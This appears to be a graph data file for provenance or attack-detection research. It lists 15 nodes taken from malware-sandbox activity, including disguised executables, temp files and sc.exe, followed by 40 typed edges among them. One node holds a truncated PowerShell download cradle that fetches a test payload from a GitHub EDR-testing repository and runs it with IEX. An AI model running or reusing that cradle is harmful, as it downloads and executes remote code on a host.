15
MP*-ns9B66.tmp 
MP-FTPServer.exe 
MF-C:\Users\admin\AppData\Local\Temp\setup_avrokeyboard_5
TP*-filezilla.exe 
SO-https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_
TP*-MincedCrackexe_cyb3a.exe 
MF-\Users\admin\AppData\Local\Temp\06ad76f4b19be8706f98441d926142af824bd2983217f6c2c02201dbb07d0224.zip
MP-ns996E.tmp
MP-Scan20230717_newshipment 202333pdf.exe
TF-C:\Users\admin\AppData\Local\Temp\RESF2C4.tmp
MP*-sc.exe
MF-attrib.exe
MP-UninsHs.exe
MP-OUTLOOK.EXE 
MF-C:\Users\admin\AppData\Local\Temp\xnoobx.c
40
0 1 FR-1
0 2 WR-1
1 2 CD-1
0 3 IJ-1
1 3 IJ-1
3 2 RD-2
4 0 RF-1
4 1 RF-1
3 4 ST-2
0 5 IJ-1
1 5 IJ-1
5 2 WR-3
3 5 IJ-2
5 4 ST-3
0 6 WR-1
1 6 WR-1
3 6 WR-2
5 6 CD-3
0 7 FR-1
7 2 CD-3
3 7 UK-2
0 8 UK-1
1 9 WR-1
5 9 EX-3
1 10 FR-1
10 2 WR-4
4 10 RF-2
5 10 IJ-3
10 6 WR-4
10 9 WR-4
1 11 RD-1
5 11 EX-3
10 11 UK-4
12 2 EX-4
4 12 RF-2
5 12 UK-3
13 4 ST-4
13 6 WR-4
13 9 EX-4
13 14 UK-4

